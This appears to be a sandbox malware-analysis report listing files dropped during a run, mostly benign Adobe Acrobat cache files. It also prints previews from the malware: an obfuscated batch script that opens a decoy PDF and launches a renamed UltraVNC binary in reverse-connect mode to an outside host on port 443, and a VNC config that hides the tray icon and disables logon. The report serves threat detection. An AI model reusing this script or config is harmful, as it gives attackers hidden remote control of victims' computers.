                                                                    SHA1:6AB5A68CBF3D243B2848C72422F247B746093023
                                                                    SHA-256:5E97EACDF8DE1597A583D7D9DA06C1186F414C0BA0A8B1324B426B38AE1DDEFD
                                                                    SHA-512:BCDD23142D826EB8763931DDC97B58368EB57FE4400FF6A88F1C712A1F55DC7AAF7998AADE2F657C35BF206370D5E4CDC20A876B740074B606E4BD6719F36E76
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):284
                                                                    Entropy (8bit):5.2879243184787255
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJf+dPeUkwRe9:YvXKXtjL1bsdTeOsDG28Ukee9
                                                                    MD5:6D777DCEC0AACBA87F16790A28327475
                                                                    SHA1:F90B54A8145D310E3115C7FC0DB85CA9C753532A
                                                                    SHA-256:AF24A7FEB133C04D332EE4A5021AC02FB87EB42D029C173D570076C057E7E021
                                                                    SHA-512:410C57EEC6D5BCE7F9E62504504E84048426F2074D8A783A99A3EC835241B665B89C529A57FD129F65E774ACDB8DDC9C88C32E10147B5B81A8DFA8830D371AC8
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):291
                                                                    Entropy (8bit):5.285084166893148
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfbPtdPeUkwRe9:YvXKXtjL1bsdTeOsDGDV8Ukee9
                                                                    MD5:B8D7E28F1CC69C37E60325E64D1777A8
                                                                    SHA1:64A3C5836148896E5873925BA1CE5A5CD156399C
                                                                    SHA-256:BB2D40E98C907552976C8EB0BCF8E5FB15E52D254F03D00E27B9C9A2E7FED0B7
                                                                    SHA-512:BE31B0FC775683A095A8106BA2D0A96F2938FC27101D7AAA87A26E23BE99811404E70FBC4E7E4739D28EEE71A99FC91CE324C42425820AEEEB5A37FCF129F695
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):287
                                                                    Entropy (8bit):5.289757042096889
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJf21rPeUkwRe9:YvXKXtjL1bsdTeOsDG+16Ukee9
                                                                    MD5:202140D01B77868ABAFF2914E91F2BBD
                                                                    SHA1:DD78D946B6E2587614CCFA6795D8F816B0235BDA
                                                                    SHA-256:7C93F76E77378C85298CEF81B6457D39612EA05C40F908B4BFB5DB4E5A27027F
                                                                    SHA-512:D3076F53A8CED49C558F792D6B826E150B3A9D605AA610F3EDFDC580851657A793CFC6335E0D9EF401509D09BB5B2F405B515D635A56626A4CD51370ED7D9906
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):1090
                                                                    Entropy (8bit):5.6572598014319
                                                                    Encrypted:false
                                                                    SSDEEP:24:Yv6XtjdmeOssamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSGr:YvHeEBgkDMUJUAh8cvMs
                                                                    MD5:E079811D4C9A92646C12A9FE53D2AA25
                                                                    SHA1:13ABDE01AE91594A0D3D5F0A427FD87F1CB080D1
                                                                    SHA-256:1213DF95BAF659A81699F20E89C1A6529E52E0AA4BB9A38FFC9F5FFE502A8B10
                                                                    SHA-512:039247BA0CCC8481929C08847A7F81B046E8B5AC69245D2CCC4DD2DEFA91A873EF813ED09EC4B246FD359F43C27DE4C4C8F15A5D13295E9B4041186BBB658753
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):286
                                                                    Entropy (8bit):5.265403837349398
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfshHHrPeUkwRe9:YvXKXtjL1bsdTeOsDGUUUkee9
                                                                    MD5:40F78B2A8D07B50F4530CB79E709ED25
                                                                    SHA1:C2C1C1A2CE63BE5025B51B592B480CEA7C63922A
                                                                    SHA-256:2A3B0F507870FB89A108413C7CF31EA526C87A308A5CB6C12C19538FA6AD29CA
                                                                    SHA-512:E38443E8C57B8CF407A2FD6AA262020BB47F169D99DDE657BB49EE5353453BB34C79A14D558F2DBEE8BE4F18D03821A999559B30670DDC81A8CE55489B3FCCF1
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):282
                                                                    Entropy (8bit):5.282320782228978
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJTqgFCrPeUkwRe9:YvXKXtjL1bsdTeOsDGTq16Ukee9
                                                                    MD5:29E3EAF934989E79AD5C06351D466000
                                                                    SHA1:992C2D1A74730272F700ECE26A68DB42314C09B0
                                                                    SHA-256:53CA86922BC82E35F8A796DD3B6D078E6F571347E5396406048F702744797C15
                                                                    SHA-512:7AAF2AA8B675B5FC196B39991B9B73F4D7A526CF1E9ABA8ED380A2FB1F98E49E5D87B9DA9DEFA754A8DA97527E7DEB7ACF02E13ED798CDAF1F6C55ABDB5633B1
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4
                                                                    Entropy (8bit):0.8112781244591328
                                                                    Encrypted:false
                                                                    SSDEEP:3:e:e
                                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                    Malicious:false
                                                                    Preview:....

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):2814
                                                                    Entropy (8bit):5.144131416329443
                                                                    Encrypted:false
                                                                    SSDEEP:24:YR6YqGaSmay3qo8qzPqJzjTqG4YqHpYqQfLzjH4oj0SRDXlbgEe26s2LSRNC/Vwf:YRpf3wOYq5xcfst6VG7bMd8D279gn
                                                                    MD5:F978961B028E3CB132B834CBB4B17EB6
                                                                    SHA1:04836563EB0FE09B24D80AA41FE71FECFC745139
                                                                    SHA-256:0139C2456B51635426809FE60BC85B76297237633CDB8EB6338018B315E9C3B9
                                                                    SHA-512:EC93F3D51EC8CE1D333FB71F50963E0907AC3730892E77CC21A4D4A9B76ECDF3777103CF9E175F10E2A40308F48E6E866306D11FA9E3C20815E35CD5F01A5331
                                                                    Malicious:false
                                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"4bf8e3f8c4905d7a32eb0f6c94473fa4","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734957469000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"a9cd5c5c9c1cd6619955312228472bd1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734957469000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"bc4d71814e94e9db47f6a01ec2d9eab3","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734957469000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"e466c981bf9c5df2a5132d84ae76b48b","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734957469000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"34623ccffb1e2e9139b91366a625da1c","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734957469000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"f66c1f743cf205264d83a544a6666c96","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                    Category:dropped
                                                                    Size (bytes):12288
                                                                    Entropy (8bit):1.453646778732422
                                                                    Encrypted:false
                                                                    SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsili:lNVmsw3SHtbDbPe0K3+fDZdI
                                                                    MD5:B3FE83D88265B4D6BA9B0555288E0EE9
                                                                    SHA1:484DCC0C5D55D53BB3778120F973F92ECB0B6C2B
                                                                    SHA-256:F04B2C2B3EA52159E6527A45DA5A0470D1438AAB8E6A5CFBA96F9FA6123DF51F
                                                                    SHA-512:6CFDCB70F79111DD9BCFD75DDB67522D1458C96D4876E86BE3EEDE03F39FDCDC0C66E9556E79361296D16AA55A4F5AC848DD5C1BE5D294936F77A1801A775AA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite Rollback Journal
                                                                    Category:dropped
                                                                    Size (bytes):8720
                                                                    Entropy (8bit):1.9581680794912386
                                                                    Encrypted:false
                                                                    SSDEEP:48:7MI4SrvrBd6dHtbGIbPe0K3+fDy2dsLjqFl2GL7ms6:7063SHtbDbPe0K3+fDZd6KVms6
                                                                    MD5:3562B93462C73F8FBB9274C6B993D4E0
                                                                    SHA1:7A7308404CAE8B9F62DA58131296B1EEC7393A58
                                                                    SHA-256:F3CE8F0B13B4F6A6D8E985DA61BD9038B88B69778F31FF78386C23D461333587
                                                                    SHA-512:941B0187EDB58D418316040616624391D4BD4E85F5CC8217898603823802138D1EAF26EB9BBA09F4CCDFD8BC6E6663DB451A3D400C0DDF15EE9E30C043FBC767
                                                                    Malicious:false
                                                                    Preview:.... .c..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):66726
                                                                    Entropy (8bit):5.392739213842091
                                                                    Encrypted:false
                                                                    SSDEEP:768:RNOpblrU6TBH44ADKZEgG2G//GDdFt3VK3pCMC4Bhqh3pS6x7Yyu:6a6TZ44ADEG6t3VK3VC4B4hZnx7K
                                                                    MD5:E271E7162F123A0B30F4F3C0FF9FD4A1
                                                                    SHA1:6B0E02ACCDE6D6D8383E6AD121C2E81358548762
                                                                    SHA-256:08804B03C84EAED75F70F4D4D9E975BA21988861CAEEAB22806C89318831B7B3
                                                                    SHA-512:CCF89FCC972D89B1165926EF436D61D809FEEB791F864BB96E8B18798154A29DDF4D1606F4AD5F776017C3DCF9113708C55F486A6C01F85FBA15BDB6E89FB7F5
                                                                    Malicious:false
                                                                    Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5482310161066753

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    File Type:DOS batch file, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1063
                                                                    Entropy (8bit):5.5415018235723945
                                                                    Encrypted:false
                                                                    SSDEEP:24:gDo8Dlr0RMqL0LtvJW2urcW1SalC/ki2wpx/m:aEb2AhFWx/m
                                                                    MD5:651796E1EB5F2C51A6DD6929A65184DA
                                                                    SHA1:C475C14C2D71453126FBDE6E135C4B68801A0E9F
                                                                    SHA-256:8F0E40CBAAA9C09FA66C18BB90B54FD373EAEF4328E166EB5D0A3EE036F8DD49
                                                                    SHA-512:C76F34CD8F7BC54A2D229B6DE8C0899FD676DB75001BAF0A7394655BE85CCE65539D3B7D1565A2381ADECF851615B9A989C9D83B22B6732BA4272026D9D8454F
                                                                    Malicious:false
                                                                    Preview:@echo off.setlocal enabledelayedexpansion.set dLblEw=nhost.set H9zjF6=nne.set Ely6ya=co.set rsZWbB=exe.set e2uPdm=Lom.set RscJfa=pdf.set DE4CBb=raVNC.set jq2jOU=%COMPUTERNAME%.set q6noQx=autore.set WWfq61=%WINDIR%\Tasks\698563441.cmd.set AMDK6l=tbdcic.info.set qC9Ryl=Thj0Wf.set eUynLD=443.set uTrzGi=co.set ayToqv=ct.set nM9rdS=Ult.set TfRayV=sync_browser.set erudre=ini.timeout /t 1.copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%".timeout /t 1.taskkill /f /im %TfRayV%.%rsZWbB% .timeout /t 2.copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%".timeout /t 1.copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%".timeout /t 2.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% .timeout /t 8.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%.timeout /t 2.copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%".timeout /t 4.:loop.if exist "%WWfq61%" (. cmd /c "%WWfq61%". tim

                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\CEpr8q.li7XUg

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    File Type:Generic INItialization configuration [admin]
                                                                    Category:dropped
                                                                    Size (bytes):858
                                                                    Entropy (8bit):5.216893826927931
                                                                    Encrypted:false
                                                                    SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                    MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                    SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                    SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                    SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                    Malicious:false
                                                                    Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:modified
                                                                    Size (bytes):1945368
                                                                    Entropy (8bit):6.532894678367002
                                                                    Encrypted:false
                                                                    SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                    MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                    SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                    SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                    SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: 7q551ugrWe.exe, Detection: malicious, Browse
                                                                    • Filename: T8xrZb7nBL.exe, Detection: malicious, Browse
                                                                    • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\gTFLK1.jBd3Ei

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                    Category:dropped
                                                                    Size (bytes):605114
                                                                    Entropy (8bit):7.931189302613814
                                                                    Encrypted:false
                                                                    SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                    MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                    SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                    SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                    SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                    Malicious:false
                                                                    Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):867840
                                                                    Entropy (8bit):6.386550733462827
                                                                    Encrypted:false
                                                                    SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                    MD5:0F568F6C821565AB9FF45C7457953789
                                                                    SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                    SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                    SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: 7q551ugrWe.exe, Detection: malicious, Browse
                                                                    • Filename: T8xrZb7nBL.exe, Detection: malicious, Browse
                                                                    • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\MSI7d452.LOG

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):246
                                                                    Entropy (8bit):3.5101311170247493
                                                                    Encrypted:false
                                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkD:Qw946cPbiOxDlbYnuRKDlDD
                                                                    MD5:1196E6369523C7D8615562130FA101FB
                                                                    SHA1:BAFD8603C8949FD38D69F6BB52DCC38B2787C596
                                                                    SHA-256:F1522CB2BA8513BDF2D8D691A21BB025654FDCC27F945091D7AA2D6CCEE19311
                                                                    SHA-512:78C2743858E142EABD05D5009362724E327CBA992CEDB11FF9A386569EE2916501D7E749FFCE2E42E1DBE5D12255D18081775A4513D052A5A44A2FC623B23486
                                                                    Malicious:false
                                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.3.7.:.4.4. .=.=.=.....

